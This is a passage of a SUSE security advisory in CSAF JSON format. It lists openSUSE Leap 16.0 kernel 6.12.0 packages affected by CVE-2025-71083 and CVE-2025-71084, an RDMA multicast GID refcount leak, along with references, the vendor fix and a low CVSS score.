"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71083"
},
{
"cve": "CVE-2025-71084",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71084"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/cm: Fix leaking the multicast GID table reference\n\nIf the CM ID is destroyed while the CM event for multicast creating is\nstill queued the cancel_work_sync() will prevent the work from running\nwhich also prevents destroying the ah_attr. This leaks a refcount and\ntriggers a WARN:\n\n GID entry ref leak for dev syz1 index 2 ref=573\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline]\n WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886\n\nDestroy the ah_attr after canceling the work, it is safe to call this\ntwice.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71084",
"url": "https://www.suse.com/security/cve/CVE-2025-71084"
},
{
"category": "external",
"summary": "SUSE Bug 1256622 for CVE-2025-71084",
"url": "https://bugzilla.suse.com/1256622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
